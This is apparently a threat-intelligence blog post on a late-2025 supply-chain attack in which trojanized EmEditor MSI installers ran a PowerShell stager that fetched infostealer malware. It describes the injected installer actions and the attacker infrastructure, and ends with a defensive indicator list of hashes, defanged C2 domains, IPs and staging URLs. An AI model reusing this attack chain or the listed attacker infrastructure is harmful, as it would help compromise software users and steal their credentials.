Trusted Tool Turned Trojan: EmEditor Official Installer Hijacked in Sophisticated Supply-Chain Attack

CyberDefender 19 mins0

In late December 2025, a sophisticated software supply chain compromise was discovered affecting EmEditor, a widely-used Windows text editor developed by Emurasoft, Inc. EmEditor is trusted by developers, systems administrators, and security professionals for large file editing, syntax highlighting, and automation capabilities. Attackers leveraged this trust in the official distribution channel to deliver malware to unsuspecting end users, illustrating the growing threat of supply chain attacks on mainstream desktop software.

What Happened

Between December 19 and December 22, 2025, and again around December 29, 2025, users downloading EmEditor from the official website were served backdoored installers that contained hidden malicious code. Instead of delivering legitimate EmEditor binaries, attackers delivered a trojanized installer that executed additional malware on the victim’s system.

Unlike typical malware distribution — where malicious code stems from email attachments or third-party sites — this incident occurred through trusted infrastructure: the official EmEditor website and its download link. Because the installer was delivered from legit domains and even digitally signed (albeit with a fraudulent certificate from an unrelated entity, “WALSHAM INVESTMENTS LIMITED”), traditional trust signals were misleading and failed to raise immediate suspicion.

This kind of attack, where attackers compromise the supply or distribution mechanism of software rather than the software itself, is the hallmark of a supply chain compromise — a high-impact tactic increasingly exploited by advanced threat actors.

Technical Anatomy of the Attack

Two Distinct Waves

Investigators reconstructed the attack timeline using timestamps extracted from installers, domain registrations, and file metadata:

  1. First Wave (Dec 19–22, 2025)
    • Attackers altered the EmEditor site’s Download Now button to point to a malicious installer.
    • Backdoored installers were generated, digitally signed with a fraudulent certificate, and made available during this window.
    • The attackers had pre-registered control infrastructure (domains) days before the first malicious installer appeared.
  2. Second Wave (Dec 29, 2025)
    • Shortly after Emurasoft released a new official build (v25.4.4), the attackers again delivered backdoored installers.
    • A new round of domains was registered to support the second wave of compromise.

The gap between these waves suggests either a refinement of attack tooling or a pause to recalibrate infrastructure in the face of detection risk.

Installer Manipulation & Forensic Indicators

Researchers used differential analysis of MSI (Windows Installer) files to isolate injected artifacts. Key findings include:

Custom Installer Actions

By comparing known good installers against compromised ones, analysts identified additional custom actions and scripts embedded within MSI tables. Specifically:

  • A Visual Basic Script named PatchFile was inserted, closely mirroring legitimate MSI table actions but redirecting execution flow to malicious code.
  • In early variants, command sequences used incorrect PowerShell cmdlets (Invoke-WebRequest) and failed to execute payloads reliably; later variants corrected this to Invoke-RestMethod, enabling successful next-stage payload download and execution.

MSI Metadata Artifacts

Installers contain internal metadata (“SummaryInformation”) including timestamps and user identifiers. In backdoored builds:

  • Inconsistent timestamps (earlier than expected) flagged manipulation.
  • A non-vendor username was present, offering a weak but useful indicator for clustering samples.

Network and C2 Infrastructure

It was identified command-and-control (C2) infrastructure tied to the attack:

  • Malicious domains resolved to servers configured to redirect PowerShell stager download requests.
  • Some domains predated the main compromise, suggesting ongoing reuse for other malicious campaigns.
  • Clusters of related domains displayed similar webserver behavior (HTTP 301 redirects or simple redirect responses), enabling defenders to derive additional indicators of compromise (IOCs).

Malware Payload & Post-Compromise Behavior

Once the backdoored installer executed on a victim system, it did more than install EmEditor. Beneath the surface, the malicious installer triggered a PowerShell-based stage loader, which fetched subsequent payloads from attacker-controlled infrastructure. While exact payloads vary across samples, the general behavioral class falls under infostealer malware — code designed to extract sensitive information from infected machines.

Infostealer malware typically aims to harvest:

  • Stored credentials
  • Browser history and session tokens
  • SSH keys or code repositories
  • Other sensitive local artifacts

Because the loader and payload were delivered post-installation, many legacy defenses that only inspect the installer binary would miss these activities entirely.

Why This Matters

This incident underscores several worrying trends in modern cybersecurity:

1. Trusted Channels Are Not Safe

Even well-maintained official distribution points can be compromised — sometimes without the software developer’s direct involvement (e.g., via compromised CMS platforms or redirect logic).

2. Digital Authenticity Can Be Faked

Malicious actors are increasingly willing to acquire fraudulent digital certificates to sign malware, eroding the trust model that digital signatures are supposed to provide.

3. Supply Chain Attacks Are Escalating

Software supply chain compromises have grown across ecosystems — from npm and PyPI packages targeting developers and blockchain wallets to desktop applications like EmEditor — making them one of the most pressing security challenges.

Defensive Lessons & Recommendations

Based on the analysis, defenders can adopt several strategic controls:

Early Infrastructure Detection

Monitoring domain registrations and web configurations related to popular software projects can provide early warning signals before malware drops occur.

Differential Installer Analysis

Tools that perform byte-level and structural comparison of installers can uncover injected actions or scripts absent from legitimate builds.

Endpoint Detection Beyond Signatures

Relying solely on signatures (including digital certificates) is insufficient. Behavioral analytics, execution tracing, and network monitoring offer better visibility into real-time compromise.

Conclusion

The EmEditor supply chain compromise represents a high-value case study in software distribution exploitation. By leveraging trusted infrastructure and social trust signals, attackers successfully ensnared unsuspecting users with infostealer malware bundled inside a legitimate-appearing installer.

Organizations — especially those in development and IT operations — should treat this incident as a call to reevaluate how trust is established in software supply chains and strengthen detection mechanisms across infrastructure, build systems, and endpoint environments.

IOCs, Files:

SHA256: 3d1763b037e66bbde222125a21b23fc24abd76ebab40589748ac69e2f37c27fc
Filename: emed64_25.4.3.msi
Sample Type: Binary/Archive/MSI
CustomAction: PatchFile
Cmdlet: Invoke-WebRequest
CustomAction SHA256: bcfda6fca68dfa203de0db0624b73a9ac22592eae708c12f17d4fff8ec99e9fc
C2 Domain: emeditorjp[.]com
Modified Timestamp: 2025-12-20T13:15:17Z

SHA256: 4bea333d3d2f2a32018cd6afe742c3b25bfcc6bfe8963179dad3940305b13c98
Filename: emed64_25.4.3.msi
Sample Type: Binary/Archive/MSI
CustomAction: PatchFile
Cmdlet: Invoke-RestMethod
CustomAction SHA256: a04727075910c90456043985e9d5119342adc77f1b45e76a7e1a79f92c1facd6
C2 Domain: emeditorjp[.]com
Modified Timestamp: 2025-12-21T13:39:07Z

SHA256: ad84f28e9bb0fcaf30846b2563a353b649ab6dc85b36d4bf58ee61a2a95b740a
Filename: emed64_25.4.3.msi
Sample Type: Binary/Archive/MSI
CustomAction: PatchFile
Cmdlet: Invoke-RestMethod
CustomAction SHA256: 7ec4ec4511404553934e0bf08f3f124544f9a76857089feb96277ddad4f15592
C2 Domain: emeditorltd[.]com
Modified Timestamp: 2025-12-29T12:37:07Z

SHA256: da59acc764bbd6b576bef6b1b9038f592ad4df0eed894b0fbd3931f733622a1a
Filename: emed64_25.4.4.msi
Sample Type: Binary/Archive/MSI
CustomAction: RemoveShortcut
Cmdlet: Invoke-WebRequest
CustomAction SHA256: 7ec4ec4511404553934e0bf08f3f124544f9a76857089feb96277ddad4f15592
C2 Domain: emeditorltd[.]com
Modified Timestamp: 2025-12-31T23:42:57Z

SHA256: 9a5be7789d31b5b0bcb92b807efffa4d96292b093921076b678a2234b30b8423
Sample Type: Text/PowerShell
C2 Domain: cachingdrive[.]com

SHA256: 78d2244ea1c3cca2d18f754a9f0e15cabe2859817dfa803583901139764a0e6c
File Type: Text/PowerShell
C2 Domain: cachingdrive[.]com
C2 Domain: emeditorde[.]com

SHA256: a310dcb08c77acfeda03437bc4b0f180198de9c9832df2cbb64758c82eb774c7
File Type: Text/PowerShell
C2 Domain: cachingdrive[.]com

SHA256: c0bbfb17e2817567265f46cbad61cb5922c67931c6fc2d9d59fb071fe214d411
File Type: Text/PowerShell
C2 Domain: cachingdrive[.]com

SHA256: edce6cabb33e84ffb4be9ee3377f326657e16b005f90d22267e0dfaab9561366
File Type: Text/PowerShell
C2 Domain: cachingdrive[.]com

SHA256: 9bb8543453878d3390593ff76f9ab6dc8209e14f64dea51f82882309fd6ede23
File Type: Text/PowerShell
C2 Domain: emeditorde[.]com

SHA256: 660fdf42c9c32a68fc36dfd8b009dfc57f9424c6a77e8525fab044bbf419829b
File Type: Text/PowerShell
C2 Domain: emeditorde[.]com
C2 Domain: emeditorgb[.]com

SHA256: 0727237bb0aee8ac452eeeb2250cf9760ed78a67115c6466b8c4414e3d89a1c7
File Type: PowerShell
C2 Domain: emeditorde[.]com
C2 Domain: emeditorgb[.]com

SHA256: 12ef3b455e93ac089495bbbf432a1c20c041bfde17903d154e4c730248f294f9
File Type: Text/PowerShell
C2 Domain: 4kkaxgfdw7l1yvv4t9v[.]com

SHA256: 511d5dd4cfc7c7d5297d31bb234669fdf01b41da4b2399e039385c0b130021f4
File Type: Text/PowerShell
C2 Domain: 795n5qr4vk02wibh[.]com

SHA256: 5c182c9ff2429f6f56952c3ddd20684aefd026f2f094ee216335186551c939b8
File Type: Text/PowerShell
C2 Domain: 8mrzhrdm0obptpp[.]com

Domains

Domain: cachingdrive[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-22T09:26:51Z
Certificate: 2025-12-22T10:07:08Z
IP: 147.45.50[.]54

Domain: emeditorde[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-19T17:17:38Z
Certificate: 2025-12-19T19:20:21Z
IP: 46.28.70[.]245

Domain: emeditorgb[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-19T19:39:26Z
Certificate: 2025-12-20T09:52:56Z
IP: 5.101.82[.]159

Domain: emeditorjapan[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-22T20:10:31Z
Certificate: 2025-12-22T19:29:24Z
IP: 5.101.82[.]118

Domain: emeditorjp[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-17T15:23:21Z
IP: 5.101.82[.]118

Domain: emeditorltd[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-22T19:39:49Z
Certificate: 2025-12-22T18:51:39Z
IP: 5.101.82[.]159

Domain: emedjp[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-22T20:21:13Z
Certificate: 2025-12-22T19:32:44Z
IP: 46.28.70[.]245

Domain: emedorg[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-22T20:55:29Z
IP: 5.101.82[.]118

Domain: emurasoftwares[.]com
Registrar: NameSilo, LLC
Created Date: 2025-12-29T07:53:30Z
Certificate: 2025-12-29T08:55:10Z
IP: 138.124.67[.]183
Certificate: 2025-12-29T09:07:03Z
IP: 5.101.82[.]159

Domain: 08qodmaloshm5zrwhww[.]xyz
State: Sinkholed

Domain: 0xax86xdizce7kg9cpdk[.]online
State: Sinkholed

Domain: 1a298k7iqspq52l4r9e[.]space
State: Sinkholed

Domain: 8mfi71rtud8fov5[.]org
State: Sinkholed

Domain: 973jgnzjgnwupd1nu[.]space
State: Sinkholed

Domain: afdwtyy38efzk[.]app
State: Unregistered

Domain: brt461jnbjvm52mw[.]biz
State: Sinkholed

Domain: daj54smzpklt5kjq[.]space
State: Sinkholed

Domain: gs9uuz4h0510qhob[.]io
State: Unregistered

Domain: z2ctmmm61dm0c3wfic[.]store
State: Unregistered

Domain: 795n5qr4vk02wibh[.]com
Registrar: NameCheap, Inc.
Created Date: 2025-06-26T17:05:19Z
Certificate: 2025-10-09T10:33:34Z
IP: 79.132.130[.]62
IP: 81.90.29[.]48

Domain: 4kkaxgfdw7l1yvv4t9v[.]com
Registrar: Web Commerce Communications Limited dba WebNic.cc
Created Date: 2025-06-05T03:40:17Z
Certificate: 2025-06-12T03:39:34Z
IP: 93.152.217[.]77

Domain: 8mrzhrdm0obptpp[.]com
Registrar: NameCheap, Inc.
Created Date: 2025-04-03T06:50:17Z
Certificate: 2025-04-12T12:42:43Z
IP: 89.169.15[.]2

Domain: keyactivate[.]cc
Registrar: Global Domain Group LLC
Created Date: 2025-12-12T00:34:40Z
Certificate: 2025-12-12T06:44:53Z
IP: 64.188.83[.]146

Domain: orangewater00[.]com
Registrar: NameCheap, Inc.
Created Date: 2026-01-22T22:04:24Z
Certificate: 2026-01-23T13:12:15Z
IP: 185.178.231[.]112

IPs

147.45.50[.]54
46.28.70[.]245
5.101.82[.]159
5.101.82[.]118
138.124.67[.]183
89.169.15[.]2
79.132.130[.]62
81.90.29[.]48
93.152.217[.]77
64.188.83[.]146
185.178.231[.]112

URLs

URL: hxxps[://]8mrzhrdm0obptpp[.]com/take/hAUjZrJo/{UUID}
Request: 3225ae94dcda9e408d87ec48694d7bfe60b125dfb4cd0c4bf19ade3772be7519
Response: d5f5a1b854eaa992731c6e17f10fe73987730e783697ecff85514c85dcff7f9f

URL: hxxps[://]4kkaxgfdw7l1yvv4t9v[.]com/take/XstQk8Ja/{UUID}
Request: 45d4802564ceadc829898791bda4a2ac6351ef529701200009b2f00b8d63c93b
Response: 10a4d863e7b90372c5de25dc9eea9cc107625e7389cd0fb500f5a99c43d39db8

URL: hxxps[://]795n5qr4vk02wibh[.]com/take/WWboshwF/{UUID}
Request: 30862ae481048915ea927c6c57b6a7d7611eada62c972dacc8d1bb1545937cf9
Response: 0af7d28482a67828e62972085b5000bfe3d8b81200e9e51b86db0a9a8e720c8f

hxxps[://]keyactivate[.]cc/gate/start/e805d522
hxxps[://]orangewater00[.]com/run/mMbcjy2q

CyberDefender